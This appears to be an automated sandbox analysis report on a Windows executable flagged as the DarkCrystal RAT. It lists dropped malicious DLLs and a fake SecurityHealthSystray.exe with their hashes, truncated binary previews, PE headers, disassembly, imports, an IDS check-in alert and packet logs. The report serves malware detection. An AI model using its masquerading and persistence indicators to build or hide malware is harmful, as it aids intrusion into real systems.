                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                            C:\Users\user\Desktop\rGzNBWQu.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):9728
                                                                                            Entropy (8bit):5.0168086460579095
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                            C:\Users\user\Desktop\tRVOBpwv.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):22016
                                                                                            Entropy (8bit):5.41854385721431
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\tnEMlbYs.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):22016
                                                                                            Entropy (8bit):5.41854385721431
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\vybNluDs.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                            C:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9874947242875076
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6bpDPtKM7Jt8Bs3FJsdcV4MKe27nd6YgYzLvqBHmOulajfqXSfbNtm:WPZPc+Vx9M8RYPvkAcjRzNt
                                                                                            MD5:AB5598E43F67BE1C10F7E5A8AF37C34D
                                                                                            SHA1:0CD56F0C9830E0BE4DB6242ECDE01996D77CA2F1
                                                                                            SHA-256:1F2B3DD31DC8223ECA3DDDBCDAB3EB9F20C589E2DB943C930643DF4D6DB535B9
                                                                                            SHA-512:3882365301088096879195A5E11EAEA4EFE30559383331FBC3628DEE045CEF08F1B6DA9FE9F0F5DBAE0B5BC9C1B52ED1D1316CE78927CD72D25D649647B44E9B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................

                                                                                            \Device\Null

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):151
                                                                                            Entropy (8bit):4.854617761109343
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXHUTfejNvoTybHKvj:Vx993DEUaUyGW7s
                                                                                            MD5:57CAE729DBFB3B33CE80F59AC240EF14
                                                                                            SHA1:A2C4D7E162293FE2B91BEE2FC04F883E443BA4A1
                                                                                            SHA-256:0E191D0C5924BA0032845AF97A0C907A7454E47730C0CEB0D98D51E4D8ACB321
                                                                                            SHA-512:C9A3AC877F0FDC9721223F7754DFF1B49748EB0C0DA6101E7D7A925A45751E6836C8AF54D9455F0F4A4BFAF5D6ED8EF351CBADAD3D662782D5041BDFCB0E3E54
                                                                                            Malicious:false
                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/03/2024 16:40:56..16:40:56, error: 0x80072746.16:41:01, error: 0x80072746.

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.763479339524128
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:H9gMIu2HXi.exe
                                                                                            File size:1'811'992 bytes
                                                                                            MD5:4fb1d8f8dff638f2c9b382f9552b18e2
                                                                                            SHA1:5bc4dbad7914ceb72dba45d1b1efffba40143653
                                                                                            SHA256:b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
                                                                                            SHA512:02fb08958f7e5abb2ae99ec87efb1ad4c7e2c895d314927af4ed452f0ba855d7d248788f46906f5b671984cc4600f31d5b97f9c3901a0238ffe36fc7582db476
                                                                                            SSDEEP:24576:AubsnafAPyjiDkXubsnafAPyjZrvoW9jdO1T2qdg+GTjMZpCfJYLw289l2zHTJnP:mIpfI1voojGT0MCfJ3AzHTlvxKyH0s1
                                                                                            TLSH:BF851203B5C0D9B2D46218330B26AF61A67DBD301F618DDB93941D5EEE322D0A736B67
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.

                                                                                            File Icon

                                                                                            Icon Hash:313397069e1b3371

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x420790
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x64C8CFB2 [Tue Aug 1 09:26:10 2023 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:0ae9e38912ff6bd742a1b9e5c003576a

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007FBA24BF21DBh
                                                                                            jmp 00007FBA24BF1B8Dh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00423A90h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            mov eax, dword ptr [esp+10h]
                                                                                            mov dword ptr [esp+10h], ebp
                                                                                            lea ebp, dword ptr [esp+10h]
                                                                                            sub esp, eax
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            mov eax, dword ptr [004407A8h]
                                                                                            xor dword ptr [ebp-04h], eax
                                                                                            xor eax, ebp
                                                                                            push eax
                                                                                            mov dword ptr [ebp-18h], esp
                                                                                            push dword ptr [ebp-08h]
                                                                                            mov eax, dword ptr [ebp-04h]
                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                            mov dword ptr [ebp-08h], eax
                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                            pop ecx
                                                                                            pop edi
                                                                                            pop edi
                                                                                            pop esi
                                                                                            pop ebx
                                                                                            mov esp, ebp
                                                                                            pop ebp
                                                                                            push ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FBA24BE4A21h
                                                                                            push 0043D14Ch
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FBA24BF4835h
                                                                                            int3
                                                                                            jmp 00007FBA24BF6708h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            and dword ptr [00463D58h], 00000000h
                                                                                            sub esp, 24h
                                                                                            or dword ptr [004407A0h], 01h
                                                                                            push 0000000Ah
                                                                                            call dword ptr [004341C4h]
                                                                                            test eax, eax
                                                                                            je 00007FBA24BF1EC2h
                                                                                            and dword ptr [ebp-10h], 00000000h
                                                                                            xor eax, eax
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ecx, ecx
                                                                                            lea edi, dword ptr [ebp-24h]

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3e3800x34.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3b40x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xeb98.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x750000x23dc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x32dcc0x32e00bf3082787caa3b02fd9d989022806d04False0.592286355958231data6.705330880207017IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x340000xb1d00xb200ba53cf76fc539872e6fb32f5b59318a2False0.46025719803370785data5.269843738840559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x400000x247500x120063d51bc646ae841bb4737f86d3d78592False0.4058159722222222data4.083590987791496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .didat0x650000x1a40x200deb77807258e64170eadd0d48c2f3f11False0.46484375data3.5190901598372837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x660000xeb980xec0046c8d29e2dbb6ee93fcbcfa5583fecc7False0.8745199947033898data7.693202276478399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x750000x23dc0x2400e49afaf69d5cac6d9ffa2d43bc30363aFalse0.7861328125data6.67388754981222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            PNG0x665240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                            PNG0x6706c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                            RT_ICON0x686180xa1abPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9967622683451325
                                                                                            RT_DIALOG0x727c40x2badata0.5286532951289399
                                                                                            RT_DIALOG0x72a800x13adata0.6560509554140127
                                                                                            RT_DIALOG0x72bbc0xf2data0.71900826446281
                                                                                            RT_DIALOG0x72cb00x14adata0.6
                                                                                            RT_DIALOG0x72dfc0x314data0.47588832487309646
                                                                                            RT_DIALOG0x731100x24adata0.6279863481228669
                                                                                            RT_STRING0x7335c0x1fcdata0.421259842519685
                                                                                            RT_STRING0x735580x246data0.41924398625429554
                                                                                            RT_STRING0x737a00x1a6data0.514218009478673
                                                                                            RT_STRING0x739480xdcdata0.65
                                                                                            RT_STRING0x73a240x470data0.3873239436619718
                                                                                            RT_STRING0x73e940x164data0.5056179775280899
                                                                                            RT_STRING0x73ff80x110data0.5772058823529411
                                                                                            RT_STRING0x741080x158data0.4563953488372093
                                                                                            RT_STRING0x742600xe8data0.5948275862068966
                                                                                            RT_STRING0x743480xe6data0.5695652173913044
                                                                                            RT_GROUP_ICON0x744300x14data1.1
                                                                                            RT_MANIFEST0x744440x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            03/29/24-15:27:21.388590TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973980192.168.2.4104.21.79.128

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 29, 2024 15:26:58.496057987 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.496095896 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:58.496179104 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.507086039 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.507098913 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:58.790369987 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:58.790456057 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.792963982 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.792972088 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:58.793252945 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:58.836966038 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.847047091 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:58.892231941 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.071341038 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.071409941 CET4434973034.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.071456909 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.076997042 CET49730443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.079942942 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.079974890 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.080061913 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.080420017 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.080440044 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.351304054 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.354690075 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.354716063 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.640638113 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.640714884 CET4434973134.117.186.192192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.641201019 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.653497934 CET49731443192.168.2.434.117.186.192
                                                                                            Mar 29, 2024 15:26:59.888309002 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:26:59.888345003 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:26:59.888418913 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:26:59.890372038 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:26:59.890382051 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.272711992 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.272861004 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.276530981 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.276540041 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.276912928 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.278119087 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.320235968 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.660253048 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.660278082 CET44349732149.154.167.220192.168.2.4
                                                                                            Mar 29, 2024 15:27:00.661943913 CET49732443192.168.2.4149.154.167.220
                                                                                            Mar 29, 2024 15:27:00.661950111 CET44349732149.154.167.220192.168.2.4
